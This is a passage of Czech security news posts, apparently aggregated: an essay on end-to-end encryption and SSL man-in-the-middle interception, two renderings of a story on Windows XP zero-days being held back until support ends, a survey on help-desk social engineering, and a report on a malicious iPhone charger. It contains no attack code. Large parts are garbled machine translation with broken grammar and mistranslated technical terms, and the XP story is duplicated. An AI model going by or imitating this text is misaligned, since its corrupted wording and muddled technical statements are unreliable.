chytrých napadených reklamních sítí k vysoce cílené a dobře řemeslně "spear phishing" útoky. Co je to "Endpoint"? Mnoho systémů slibují "end-to-end šifrování". Podle mého názoru, end-to-end šifrování znamená, že zpráva je zašifrována odesílatelem před přenosem a dešifrovat * Konečná * příjemci. Definice * vlastní * je rozhodující zde. Mnoho zpráv kódované systémy dešifrovat zprávu na serveru, znovu zašifrovat pro příjemce. Tento režim se vystavit vaši zprávu zachytit na relé bodu. Pokud nechcete ovládat relé bod, pak se vaše zpráva je ohrožena zachycuje. Například Skype. Skype používá docela solidní šifrovací systém. Aby však bylo možné podpořit vlastnosti, jako brány do jiných telefonních systémů, příslušná brána musí být schopen dešifrovat zprávy. Kdykoliv váš bezpečný komunikační systém je schopen komunikovat s nezajištěnými koncovými body, někdo musí být schopen dešifrovat zprávy. Podobně se systémy webmail.
Tam jsou některé pokusy postavit end-to-end šifrované systémy, webové pošty, které používají na straně klienta, JavaScript nebo pluginy pro šifrování a dešifrování zpráv. Ale tyto systémy nejsou v širokém použití v tomto bodě. Cloud zpráv systémy jsou samozřejmě v určité problematické a je třeba navrhnout opatrně, aby dešifrování "v oblaku", které zase funkcí přestávky, jako je hledání a indexování pomocí cloud zdroje. SSL infrastruktury Existují dva způsoby, jak "očichat" SSL: Na jedné straně můžete nahrávat SSL šifrované relace a dešifrovat je offline. Bez znalosti privátních klíčů nebo master klíče zúčastněných, tento proces je velmi obtížné, pokud vůbec možné. Mnohem více běžně používaný způsob, jak zachytit SSL použít "Man in The Middle" útoku. Opět se týká "end-to-end" pojetí. Útočník ukončí připojení SSL a znovu zašifruje jej zamýšlenému příjemci. SSL poskytuje podepsané certifikáty, aby se zabránilo tento útok, a klienti upozorní uživatele, pokud neplatný certifikát. Prvním problémem je, že uživatel může ignorovat varování, vzhledem k tomu, že příliš mnoho "skutečné" SSL certifikáty nejsou správně nakonfigurovány a produkovat toto upozornění. Za druhé, bude prohlížeč považovat certifikát za platné, pokud je podepsán důvěryhodnou certifikační autoritou. Certifikační orgány byly zneužity v minulosti. Mnoho vlád kontrolovat certifikační autority a jsou schopni generovat spolehlivé certifikáty vydávat jiné stránky. Lidské faktory kolem certifikačních autorit a útočníků budou moci získat platné certifikáty jsou mnohem větší hrozba a SSL může být považována za zlomené na nějakou dobu jako výsledek. Nástroje jako sslstrip bude samozřejmě kořist na lidské rozhraní komponenty opět vést k více "elegantní" člověka ve středním útoku. Tak co mám dělat? V zabezpečení sítě, vždy mám málo času a omezené zdroje k boji neomezené starosti.
Za prvé, soustředit se na koncových bodech. Ty jsou mnohem větší pravděpodobnost, že trpí kompromisu kvůli špatne koncový bod pak hrubou silou dešifrovat SSL relace. Za druhé, je potřeba zkontrolovat konfiguraci SSL klientů a serverů. Používáte nejsilnější možnou šifrovací algoritmus? Jste při použití nejdelších možných klíčů? Toto je jedna z věcí. Například, ne všechny systémy Podporuji něco za TLS 1.0. Přidat příslušných vylepšení vašeho plánu. Konečně: Šifrování všechno. Dokonce i sofistikované protivník má použít nějaký konečný zdroj pro provoz dešifrovat. Zvýšení pracovní zátěž pomocí šifrování veškeré komunikace, a to nejen "důležité" provoz je jeden způsob, jak prodloužit životnost vašich informací. V případě uzavřených sítí, které nemají ke komunikaci s okolním světem, za budování své vlastní SSL infrastruktury (NOT implementovat vlastní knihovny SSL). Nastavte si vlastní CA a důvěřovat pouze certifikáty podepsané svým vlastním CA. Ale nakonec, tráví svůj čas na problémy, které věci. Je až příliš snadné nechat se rozptylovat titulkem dne.
Ukončení podpory pro Windows XP bude ráj hackerů
Experti si myslí, že hackeři s vypuštěním zranitelností a zero-day pro Windows XP počkají, dokud Microsoft zastaralému operačnímu systému neukončí v dubnu příštího roku podporu.
Hrozby | Zabezpečení
Jason Fossen, expert na zabezpečení Microsoftu v úterý poznamenal, že je to ukázka ekonomiky v praxi. „Průměrná cena zranitelnosti na Windows XP se na černém trhu pohybuje kolem 50 až 150 tisíc dolarů. Je to relativně nízká cena, ve které se odráží přístup Microsoftu k opravám,“ řekl Fossen. Pokud se totiž ve Windows XP nějaká zranitelnost objeví, Microsoft ji začne okamžitě vyšetřovat a brzy vydá aktualizaci pro všechny uživatele. To se však v dubnu změní.
Microsoft přestane aktualizace pro Windows XP pro většinu uživatelů vydávat a nové záplaty tak získají pouze organizace, které za ně zaplatí.
„Pokud dnes někdo objeví spolehlivou zranitelnost v XP, která lze provést pomocí vzdáleného přístupu a vypustí ji dnes, Microsoft ji bude mít opravenou za pár týdnů,“ poznamenal Fossen. Když však počkají, cena se pravděpodobně zdvojnásobí.“
Pokud má Fossen pravdu, mělo by se to projevit v prudkém poklesu zveřejněných a použitých zranitelností během poslední čtvrtletí roku 2013 a začátkem roku 2014. Fossen zdůraznil, že mají hackeři k trpělivosti silnou motivaci.
Žádný příklad z minulosti, který by Fossenova slova potvrdil či vyvrátil, neexistuje. Když Microsoft ukončil v roce 2010 podporu pro Windows 2000, byl tento operační systém pouze na čtyřech desetinách procenta všech počítačů. XP mají podíl podstatně vyšší. Podle současných odhadů bude Windows XP v době ukončení podpory na 34% osobních počítačů.
Fossen je přesvědčen, že se Windows XP stanou lákavým a snadným cílem. Spekuluje také o tom, zda se tím Microsoft nedostane do takové pozice, kdy bude muset ze svého ultimáta vycouvat a aktualizaci přeci jenom vydat.
„Pokud si hackeři počkají a vypustí několik zero-days krátce za sebou, mohlo by to vytvořit takové problémy, že uživatelé budou aktualizaci vyžadovat opravdu hlasitě,“ řekl.
Mezi analytiky však panuje shoda v tom, že Microsoft ze svého rozhodnutí neustoupí. Nejen, že by to vytvořilo nevítaný precedent, navíc by si tím odstranil všechny páky, jak opozdilce přesvědčit k aktualizaci operačního systému na Windows 7 nebo 8.
Počítačoví zločinci "šetřit" vlnu útoků Windows XP, kdy Microsoft přestane podporovat Napsal: 12.08.2013 22:58 PDT Zranitelnosti | Hrozby Počítačoví zločinci se rozpoutá vlnu "zero-day" zranitelnosti k útoku na systém Windows XP stroje po 08.04.2014, bezpečnostní expert prohlásil. Microsoft se zastaví uvolněním aktualizace zabezpečení pro operační systém k tomuto datu.
Zločinci budou "sedět" těchto chyb až do uvedeného data, aby více peněz ze svých činů, v souladu s Jasonem Fossen vzdělávacích SANS bezpečnostní firmy.
V současné době jsou chyby opravené Microsoft. Po dubnu se pouze společností, které platí pro vlastní podpory může být chráněn - a až třetina organizací se očekává, že i nadále používat systém Windows XP stroje.
"Průměrná cena na černém trhu za zneužití systému Windows XP je 50.000 dolarů 150.000 dolarů - relativně nízká cena, která odráží Microsoft odpověď," řekl Fossen, mluví k ComputerWorld.
"Když někdo zjistí, velmi spolehlivý, vzdáleně spustitelného XP zranitelnosti, a publikuje dnes, bude společnost Microsoft záplatu během několika týdnů. Ale když sedí na zranitelnosti, cenu za to mohlo velmi dobře double. "
Fossen práce je založena na stále značného počtu osobních počítačů používajících systém Windows XP.
Windows XP, který vyšel v roce 2001, je stále druhý nejvíce populární verze Windows - 38,7% osobních počítačů používaných XP od druhého čtvrtletí letošního roku, podle NetMarketShare.
ComputerWorld se předpokládá, že 33 - 34% bude stále spustit operační systém, kdy Microsoft přestane oprav to. To je v ostrém kontrastu, Fossen říká, na nízká čísla v prostředí Windows 2000, když to bylo vysloužilé v červenci 2010 - čtyři desetiny z 1%, v závislosti na monitorování pevných Net Applications. Dokonce tak, tam byly zprávy s nulovými dnů zaměřených na systém Windows 2000, kdy odešel do důchodu, podle zprávy Computerworld.
Výzkum Camwood, britský poradenství v oblasti softwaru, našel již dříve v tomto roce jen 42% firem se systémem Windows XP začali proces migrace.
Společnost Microsoft doporučuje ponechat alespoň 18 měsíců migrovat. Jeden z pěti IT dotázaných uvedla, že mají v úmyslu pokračovat v používání operačního systému, přestože si byli vědomi rizik.
ESET podcast nabízí některé nové bezpečnostní tipy pro stárnoucí OS zde.
Postu Počítačoví zločinci "šetřit" vlna Windows XP napadne, když Microsoft přestane podpora poprvé objevil na Žijeme zabezpečení.
Sociální inženýrství vrcholy seznam help desk bezpečnostních hrozeb 18. července 2013. Hrozby Nápověda desky jsou nejčastěji kladené pomoci uživatelům při řešení společných problémů, IT, včetně resetování hesel a aplikace a problémy s připojením. Často výkon zaměstnanců helpdesku se měří podle toho, jak rychle mohou sloužit volající a problém vyřešit. Bohužel, v mnoha případech zabezpečení nehraje významnou roli v procesu, a jako výsledek, help desk staly nezamýšlené vstupní bod pro hackery a škodlivým zasvěcenci se snaží získat přístup k citlivým podnikovým zdrojům. Většina respondentů (69%) Nový průzkum SANS identifikovat sociální inženýrství jako jejich největší hrozbu pro bezpečnost help desk. Přesto většina organizací stále používá základní osobní údaje, včetně jména / umístění a zaměstnanec identifikační číslo pro ověření identity volajících do helpdesk - informace, které mohou být snadno získaný podvodníka. Kromě toho bude mnoho zaměstnanců help desk obejít bezpečnostní kontroly ve snaze být vstřícnější k volajícímu. Kromě lidské složky, nedostatek školení, nástroje a technologie také hraje klíčovou roli v celkovém zabezpečení help desk. Více než 51% respondentů uvedlo, že mají mírný přístup k helpdesku na bezpečnost jako součást svých celkových firemních bezpečnostních kontrol, ale nejsou nutně se zaměřením na vzdělávání a dalších technologií pro day-to-day činnosti. U většiny rozpočtů závisí na počtu obsluhovaných uživatelů, spíše než náklady na volání, nebo dokonce stát potenciálních narušení bezpečnosti, o zřízení návratnost investic (ROI) pro nové procesy, doplňková školení a nástroje pro každodenní podporu může být velmi obtížné. další zjištění patří:
44% respondentů zvolilo ověření volání v uživateli mnohem větší hrozba, než pro osoby samostatně výdělečně uživatelů služeb (11%). Pouze 10% respondentů zvolilo své postupy zabezpečení pro help desk jako robustní. Téměř 43% respondentů neberou náklady na bezpečnostní incident v úvahu při stanovení jejich help desk rozpočet, ale spíše Help Desk rozpočty jsou stanoveny podle počtu uživatelů. Help Desk je i nadále upřednostňovanou metodou pro zaměstnance k řešení základních problémů IT. Jeho velmi charter je lépe sloužit uživatelům a jako výsledek, help desk pracovníci mohou obsahovat nadměrné oprávnění dělat to atraktivní cíl pro sociální inženýry a technickými hackerům pokoušet se získat přístup do sítě. Za účelem vyplnění mezery o zranitelnosti helpdesku, organizace potřebují, aby přehodnotili svůj přístup, aby splňovaly požadavky na pohodlí uživatelů při současné ochraně proti hrozbám. Doporučené osvědčené postupy patří: automatizace a samoobslužné možnosti pro běžné uživatele otázek , včetně resetování hesel pomoci snížit počet chyb a slabin, které vedou k úspěšné porušení a krádežemi dat. Robustní a dalšího vzdělávání pro pracovníky helpdesku naučit se rozpoznat a reagovat na potenciální sociálního inženýrství útoky. Pokročilé nástroje . které využívají dynamické datové zdroje a nové metody ověřování přesněji identifikovat uživatele a jejich umístění Sam Curry, vedoucí technolog, RSA, bezpečnostní divize společnosti EMC, řekl: "V mnoha případech help desk je první linii obrany proti jejich porušování a zajištění by mělo být stejně důležité jako všechny ostatní důležité obchodní funkce. Nové help desk musí usilovat o rovnováhu zvýšení bezpečnosti a pohodlí koncového uživatele, která se integruje přímo do security process přidáním technologií pro automatizaci a podnikové úrovni ověřování a průběžné vzdělávání zmírnit lidské chyby. "
Fake iPhone nabíječka může zaseknout iOS v rámci 60 sekund 03.6.2013 Hrozby Falešný iPhone nabíječka by mohla být použita, aby se vyhnula obranu smartphonu Apple, tři vědci z Georgia Tech tvrdí. V nadcházející prezentaci na letošním Black Hat konferenci Bezpečnost v Las Vegas, výzkumníci tvrdí, že vytvořili "škodlivý", nabíječku, která může vnést software do zařízení iOS za necelou minutu. "Apple iOS zařízení jsou považovány za mnoho být bezpečnější než jiné mobilní nabídky," uvádí zpráva. "Zkoumali jsme, do jaké míry bezpečnostní hrozby se vzít v úvahu při provádění každodenních činností, jako je nabíjení zařízení." Vědci jmenoval jejich "škodlivé nabíječky" mactans - odkaz na Latrodectus mactans, vědecký název pro černou vdova. Falešný iPhone nabíječka byl postaven za použití základní open-source jedno palubní počítač, a které mohou ohrozit stávající generace iOS zařízení bez zásahu uživatele - vstřikování software, který vědci tvrdit, je velmi obtížné odhalit. "Všichni uživatelé jsou ovlivněny, jak náš přístup nevyžaduje ani jailbroken zařízení ani interakce uživatele," výzkumníci Billy Lau, Yeongjin Jang a Chengyu Song řekl ve svém souhrnu hovoru. "Výsledky byly alarmující: přes nepřeberné množství obranných mechanismů v iOS, jsme úspěšně aplikovat libovolný software do současné generace zařízení Apple používají nejnovější operační systém (OS) software," uvádí zpráva. "Pro zajištění stálosti výsledného infekce, ukážeme, jak útočník může skrývat jejich software stejným způsobem Apple skrývá své vlastní vestavěné aplikace." "Tento hardware byl zvolen prokázat snadnost, s níž nevinně vypadající, může škodlivý USB nabíječky být postavena," uvádí zpráva. "Zatímco mactans byla postavena s omezeným množstvím času a malým rozpočtem, jsme také krátce zvážit, co více motivovaní a dobře financované protivníci mohli dosáhnout." V rozhovoru pro Andy Greenberg Forbes, výzkumníci říkají, že kontaktoval Apple, pokud jde o exploit, ale ještě ozvou. Greenberg poukazuje na to, že tento hack není první, kdo se využít kombinovaných dat a napájecího portu na iOS - mnoho "útěk z vězení" hacky tak učinit - ale, že tato metoda je mnohem "méně přátelské". Příspěvek Fake iPhone nabíječka může zaseknout iOS v rámci 60 sekund se objevil poprvé na Žijeme zabezpečení.
